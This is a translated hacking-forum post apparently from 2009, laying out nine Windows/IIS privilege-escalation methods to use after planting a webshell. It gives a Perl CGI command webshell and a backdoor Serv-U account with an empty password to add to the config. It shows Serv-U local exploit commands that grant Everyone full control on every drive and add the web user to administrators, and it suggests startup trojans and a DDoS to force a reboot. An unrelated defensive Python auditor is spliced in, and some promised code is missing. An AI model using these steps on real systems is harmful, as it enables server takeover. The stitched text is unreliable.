Nine ultimate tips for elevating (web) privileges

ID MYHACK58:62200923591
Type myhack58
Reporter Anonymous
Modified 2009-06-15T00:00:00


Once we have a webshell, the next thing to do is elevate privileges. My personal summary is as follows:

  1. C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ See whether you can jump to this directory. If you can, that is the best case: take the CIF file directly from it, recover the pcAnywhere password, and log in.
  2. C:\WINNT\system32\config\ The SAM is in here; crack the users' passwords from it. Software for cracking SAM passwords: LC, SAMInside.
  3. C:\Documents and Settings\All Users\Start Menu\Programs\ See whether you can jump here. From here we can get a lot of useful information, since many shortcuts are visible. We generally pick Serv-U, view the shortcut's properties locally to learn its path, and see whether we can jump there. Once inside, if we have permission to modify ServUDaemon.ini, add a user with an empty password:

        [USER=WekweN|1]
        Password=
        HomeDir=c:\
        TimeOut=600
        Maintenance=System
        Access1=C:\|RWAMELCDP
        Access1=d:\|RWAMELCDP
        Access1=f:\|RWAMELCDP
        SKEYValues=

     This user has the highest permissions; we can then ftp in and use quote site exec xxx to elevate privileges.
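As an added defender-side example (not part of the original post or of any Serv-U tool), the following Python audits a ServUDaemon.ini for accounts with the profile just described: empty password, Maintenance=System, and write-class rights on a drive root. The ini text is constructed for the demo, and treating any access letter other than R, L and E as write-class is an assumption.

```python
import re
# Constructed sample (not a real file): a normal account plus the empty-password pattern above.
SAMPLE_INI = """\
[USER=backup|1]
Password=ab1234567890abcdef1234567890abcdef
HomeDir=d:\\backups
Access1=d:\\backups|RL
[USER=WekweN|1]
Password=
HomeDir=c:\\
Maintenance=System
Access1=C:\\|RWAMELCDP
Access2=d:\\|RWAMELCDP
"""
USER_HDR = re.compile(r"^\[USER=([^|\]]+)")  # matches [USER=name|1]
DRIVE_ROOT = re.compile(r"^[A-Za-z]:\\?$")    # c: or c:\
READ_ONLY = set("RLE")  # assumption: R(ead), L(ist), E(xecute) are the harmless letters

def parse_users(ini_text):
    # Returns {username: {key: value, "access": ["path|rights", ...]}}.
    users, cur = {}, None
    for line in (raw.strip() for raw in ini_text.splitlines()):
        if line.startswith("["):              # new section; only [USER=...] is tracked
            m = USER_HDR.match(line)
            cur = m.group(1) if m else None
        elif cur and "=" in line:
            u = users.setdefault(cur, {"access": []})
            key, _, val = line.partition("=")
            if key.startswith("Access"):       # Access1, Access2, ... may repeat
                u["access"].append(val)
            else:
                u[key] = val
    return users

def audit_user(u):
    # Findings for one parsed user; an empty list means nothing was flagged.
    findings = []
    if u.get("Password", "") == "":
        findings.append("empty password")
    if u.get("Maintenance", "").lower() == "system":
        findings.append("Maintenance=System (server-wide admin)")
    for entry in u["access"]:
        path, _, rights = entry.partition("|")
        if DRIVE_ROOT.match(path) and set(rights.upper()) - READ_ONLY:
            findings.append("write-class rights on drive root %s (%s)" % (path, rights))
    return findings

def audit_ini(ini_text):
    # Maps every username to its findings (empty list = nothing flagged).
    return {n: audit_user(u) for n, u in parse_users(ini_text).items()}
```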

  4. c:\winnt\system32\inetsrv\data\ This directory is likewise Everyone: full control. What we do is upload an elevation tool there and then run it.
  5. See whether you can jump to the following directories: c:\php (use phpspy) or c:\perl (not necessarily that directory; as before, you can find it by downloading a shortcut and viewing its properties), using a cgi webshell:

    #!/usr/bin/perl
    # Minimal CGI command shell: runs the query string as a command and
    # returns its output inside an HTML <pre> block.
    binmode(STDOUT);
    syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);
    $_ = $ENV{QUERY_STRING};
    s/%20/ /ig;
    s/%2f/\//ig;
    $execthis = $_;
    syswrite(STDOUT, "<html><pre>\r\n", 13);
    open(STDERR, ">&STDOUT") || die "Can't redirect STDERR";
    system($execthis);
    syswrite(STDOUT, "\r\n</pre></html>\r\n", 17);
    close(STDERR);
    close(STDOUT);
    exit;

Save this as a .cgi file and execute it. If that does not work, try the .pl extension: rename the .cgi file to .pl and submit http://anyhost//. If it displays "access denied", it can be executed. Next, upload su.exe (the Serv-U elevation tool) to the Perl bin directory and submit:

    http://anyhost//\perl\bin\su.exe

It returns:

    Serv-u >3.x Local Exploit by xiaolu
    USAGE: serv-u.exe "command"
    Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"

We now have IUSR permissions. Submit:

    http://anyhost//\perl\bin\su.exe "cacls.exe c: /E /T /G everyone:F"
    http://anyhost//\perl\bin\su.exe "cacls.exe d: /E /T /G everyone:F"
    http://anyhost//\perl\bin\su.exe "cacls.exe e: /E /T /G everyone:F"
    http://anyhost//\perl\bin\su.exe "cacls.exe f: /E /T /G everyone:F"

If the following information is returned, it indicates success:

    Serv-u >3.x Local Exploit by xiaolu
    <220 Serv-U FTP Server v5.2 for WinSock ready...
    >USER LocalAdministrator
    <331 User name okay, need password.
    >PASS #l@$ak#.lk;0@P
    <230 User logged in, proceed.
    [+] Creating New Domain...
    <200-DomainID=2
    <220 Domain settings saved
    [+] Domain xl:2 Created
    [+] Creating Evil User
    <200-User=xl
    <200 User settings saved
    [+] Now Exploiting...
    >USER xl
    <331 User name okay, need password.
    >PASS 111111
    <230 User logged in, proceed.
    [+] Now Executing: cacls.exe c: /E /T /G everyone:F
    <220 Domain deleted

Now every partition is Everyone: full control. Next we promote our user to administrator:

    http://anyhost//\perl\bin\su.exe "net localgroup administrators IUSR_anyhost /add"

  6. If you can successfully run "cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps", you can use it to elevate privileges. Running

        cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps

     lists the DLLs that run in-process with the privileges of the IIS service: idq.dll, httpext.dll, httpodbc.dll, ssinc.dll, msw3prt.dll. Then add asp.dll to this privileged family. asp.dll lives at c:\winnt\system32\inetsrv\asp.dll (on different systems the location is not necessarily the same). We now add it:

        cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "c:\winnt\system32\inetsrv\asp.dll"

     You can use cscript adsutil.vbs get /W3SVC/InProcessIsapiApps to check whether it has been added to the list.
  7. You can also use the following code to try to elevate, though the effect does not seem obvious:

Use this code to check whether the elevation succeeded:

  8. C:\Program Files\Java Web Start\ If you can get in here (generally very rare), you can try a JSP webshell. I heard its permissions are very limited; I have not run into this myself.
  9. Finally, if the host is locked down to an extreme degree, you can try writing a bat, vbs, or similar trojan into c:\Documents and Settings\All Users\Start Menu\Programs\Startup, then wait for the host to restart, or use your DDoS to force it to restart, to achieve elevation.